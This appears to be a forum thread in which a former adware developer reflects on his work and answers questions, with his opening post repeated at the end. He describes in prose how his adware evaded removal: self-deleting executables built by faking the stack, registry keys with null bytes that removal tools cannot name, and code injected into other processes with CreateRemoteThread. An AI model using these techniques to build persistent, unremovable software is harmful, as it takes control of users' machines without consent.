I gave this interview a long time ago to a completely unknown security blogger. (I think her blog had like 10 subscribers at the time). Quite a while later, she published it, and she had gotten at least one more subscriber in the mean time, and that was Bruce Schneier. He reblogged it on his blog, and from there it took off on slashdot, reddit, news.yc, etc..
The article linked to my site, which in turn had my cell phone number on it. I figured that I would get a massive avalanche of death threats, etc., but interestingly, I was only contacted a few times by email, and those were all positive things (offers for consulting gigs that I didn't take, a few conference talks that I did and that ultimately led to me joining twitter a while later, requests for advice).
It was striking to me at the time that the collective reaction of the world was so positive. I had feared that I would be stuck in an adware-developer ghetto forever. We often talk about the fact that Silicon Valley has succeeded in part due to its stance on failure, and I sense an echo of that in how it shook out for me.
Feel free to ask me anything. I figure it's the ongoing part of my penance. :)
I didn't catch this when it was first posted, I'm glad it showed up here.
Possibly you didn't get negative responses because you were sincere and introspective. Most people can understand the idea that when in need of money, you slowly make concessions and compromises that you wouldn't otherwise make.
I remember when I was at Red Hat, one of the engineers had found a way to clear a worm off Red Hat servers using our auto-update tool, but we weren't allowed to push it because of the possible unintended consequences.
I'd be really curious to hear about whether you had to face any of those kinds of things, were there any catastrophes (technically) when doing so much low level wrangling? It seems like one false move could drop half your nodes, were there any fail-safes?
Also, unrelated (and apologies for the Quora link), here's a really cool answer from someone who used to spam people: http://qr.ae/Ga85e It's very different from your experience in that they were non-technical and in a poor region, but still interesting to see global perspectives on similar work.
I think you're right. If people talk honestly about why they did things and weren't obviously trying to do ill from the start, it's pretty easy to empathize.
I read that the participants in the Milgram experiments were _way_ disproportionally likely to be conscientious objectors later in life, and that they attributed this to having been in the experiments. I hope that I've been immunized like they were.
We were crazy careful about screwing up people's machines, because anything that we did that made it seem to malfunction would likely result in them reinstalling the OS over us, and while we had some ideas about how to persist across a reinstall, it was a few bridges too far.
I certainly can't say that we avoided all catastrophe, but I'm not aware of us ever causing one. We had pretty good abstractions: the stack-shuffling code was fully encapsulated so that it wasn't just littered about our normal code, etc..
We also tried pretty hard to avoid the really dangerous stuff. It sounds crazy to put arbitrary code in some random process, but if you know that it doesn't leak, and it never interacts with other threads in the process, it's not really _that_ risky, really.
One thing that probably also helped is that we had so much feedback from the individual ad clients. So we would know pretty fast if something started happening.
Really interesting. I've watched controlled environments of less than 50 nodes go completely haywire from bad code, so it's quite a feat to push code into 4 million questionable environments while at the same time dodging the virus soup from competitors.
I think it's harder to safely do changes to development machines, because the coupling between components is greater. If you want to change, eg., libxml or something like that, lots of processes that you don't know about might be effected, and all hell can break loose.
By contrast, I was generally nuking random userland processes, which no process (or user) would mourn or miss. I think that is a lot safer. There were cases where we would touch something important, like the CreateRemoteThread stuff, but that was a relatively small amount of our code, which rarely changed, and again, it had very little interction with anyone else's code.
It's also possible that we _did_ create a lot of havoc, but I didn't know. I think that's less likely because I think we would have noticed the loss of revenue, but it's possible.
Yeah, I learned tons about Windows internals. Three standouts:
1: We never hit a limit to what you could do to the stack. It was trivial to write a function F that would fake the stack such that you would then "return from" some other function G (that had never actually been called) to yet a third function H that did something you wanted. This turned out to be useful in creating self-deleting executables.
2: There were several cases in which backward-compatibility APIs created opportunities for the clever. One example was the handling of registry strings. They are, internally, WinNT counted unicode strings, but are generally accessed by older Win32 apps, which use C strings. This means that you could create a registry key using the WinNT APIs, where the string identifier for the key had a null byte in the middle. Then Win32 apps (like some written by competitors to kill our apps, and also regedit) would be unable to do anything to that registry key, because it literally could not express the key's name.
3: windows is CRAZY hackable. It supports an API called CreateRemoteThread, which lets you start a thread in some other, random process, running arbitrary code that you specify. This means that if you can get a file down to the machine and execute it, it can load a bunch of bytes into memory, tell other processes to execute them, and terminate, using 1: above to delete itself. This made it a fairly hard target for most removal techniques-you'd have to find all the threads, out of all the threads running on the system, that were running my code, and kill them before they could replicate into another process and/or find the processes that were killing their siblings and retaliate.
Windows also allows random processes to tell the OS that they are SO IMPORTANT that the OS should immediately BSOD on that process terminating. We never used that one.
As far as stuff I still use today, no specific technical techniques, but lots of general things:
- It's crazy how fast you can level up with a hard problem and room to run. I knew basically nothing when I started, and within a year or so, the team I ran and I had done some pretty cool stuff, and beat the hell out of a lot of other companies. For a while, I was told that installing our adware was the best way to uninstall some obscure but horrendous russian malware.
-Tools trump humans. Lots of other companies were trying to clobber us at the same time we were clobbering them. We mostly won, and in several cases completely ran the table against the other company. (by which I mean we wiped them completely off the machines that had both their client and ours, without losing a significant number of machines ourselves). It wasn't that they were dumb or we were geniuses, but we would write like 10 lines of scheme and they would have to write a whole new executable, probably a few thousand lines. Probably lots of coders were faster than us, but not many were 100X faster.
There were probably others, but those are the standouts.
Having had my Milgram immunization, I would probably be able to resist the temptation. :)
That said, I doubt anyone would be particularly interested: all of this is pretty out-of-date: I was pretty good with Wins ME, 98, and XP, but I don't know anything about Vista and more recent versions. It wasn't _that_ hard to figure this stuff out-the TLAs must have vastly better people.
It does make me wonder what's going on in China, though: I'm told they are basically all XP. Is there an insane amount of hacking going on there? I've periodically thought about setting a honeypot to see what's up. It turns out to be really hard: you can't just run XP in a VM, because most VMs are (were?) detectable by even a moderately sophisticated attacker. The best idea I had was to have an external box record all the traffic in and out, and have a process on-box watch for new processes and track them. Maybe I would find some interesting beasties.
What do you mean you could write 10 lines of scheme where there would have to write a whole new executable? Did you have some really applicable template or something, or are you just implying that Scheme is vastly more productive than C?
I talked with some of the opposition later in job interviews, and they would typically write/modify a program in C that would find and kill our client. Their process tended to be: get a machine with our client, write a program that would find some trace of us and kill it, but not get everything, edit C, reinstall, recompile, repeat.
My process was: get their client installed, poke around in repl until I was confident I could find it and all its friends, write a function to clobber all of that, then iterate if needed. Where they would have to edit/recompile/run, I would just do a new thing in a repl. Then, too, my code was shorter, mostly from scheme vs. c and partly because I had better libraries than they did.
>I said, “I know enough C that I could kick the virus off the machines,” and I did. They said “Wow, that was really cool. Why don’t you do that again?” Then I started kicking off other viruses, and they said, “That’s pretty cool that you kicked all the viruses off. Why don’t you kick the competitors off, too?”
>It was funny. It really showed me the power of gradualism. It’s hard to get people to do something bad all in one big jump, but if you can cut it up into small enough pieces, you can get people to do almost anything.
This rings incredibly true to me. Especially in my job field.
edit:
>The good news is that I’ve been on the other side of those automated script things. Their capability is incredibly dangerous, but the actuality tends not to be.
>It would have been fairly trivial for me to go spelunking for people’s credit card information or whatever. I had four million nodes. I could have done it without anybody at the company even noticing. I was the guy writing Scheme, so I could have just put a text file somewhere and then made it go away, and there wouldn’t even have been an executable lying around.
>But I didn’t. To do that, by definition you have to be willing to become a criminal, and that’s a little bit rare. So I’m not too worried about that.
I also think this is a good point. A lot of services out there could potentially ruin your life (or at least make it difficult) if there's a rogue employee who targets you (or targets a lot of people). An ISP employee looking at web logs, a Google employee reading all your emails... The same goes for the NSA, just the power that can be abused is even larger.
I think it's inevitable that human ability to access these kinds of things will never become impossible, so I hope that companies (and the NSA) are instituting controls and checks, including anomaly detection, to find rogue, malicious, or snooping employees.
It seems to me that very few organizations () have effective countermeasures against bad behavior, but very little seems to happen anyway.
() google had that guy who stalked people ( http://gawker.com/5637234/gcreep-google-engineer-stalked-tee... )
and I've read that intelligence circles have a whole category called LOVINT for people spying on crushes. That said, they have hundreds of thousands of employees between them, and the incidence rate is probably really low.
>> It would have been fairly trivial for me to go spelunking for people’s credit card information or whatever... But I didn’t. To do that, by definition you have to be willing to become a criminal, and that’s a little bit rare. So I’m not too worried about that.
>> It was funny. It really showed me the power of gradualism. It’s hard to get people to do something bad all in one big jump, but if you can cut it up into small enough pieces, you can get people to do almost anything.
Yeah, I can absolutely see what you mean, but I don't think there is as much incongruity as you think.
Had I been working for the russian mob or whatever, that is, an organization that is comfortable with being explicitly criminal, I don't know and fear what would have happened. However, generally, most organizations are not comfortable with telling employees to break the law, most of the time. In particular, it seems to me to be really rare in the private sector-I don't have any real experience with government.
I gave this interview a long time ago to a completely unknown security blogger. (I think her blog had like 10 subscribers at the time). Quite a while later, she published it, and she had gotten at least one more subscriber in the mean time, and that was Bruce Schneier. He reblogged it on his blog, and from there it took off on slashdot, reddit, news.yc, etc..
The article linked to my site, which in turn had my cell phone number on it. I figured that I would get a massive avalanche of death threats, etc., but interestingly, I was only contacted a few times by email, and those were all positive things (offers for consulting gigs that I didn't take, a few conference talks that I did and that ultimately led to me joining twitter a while later, requests for advice).
It was striking to me at the time that the collective reaction of the world was so positive. I had feared that I would be stuck in an adware-developer ghetto forever. We often talk about the fact that Silicon Valley has succeeded in part due to its stance on failure, and I sense an echo of that in how it shook out for me.
Feel free to ask me anything. I figure it's the ongoing part of my penance. :)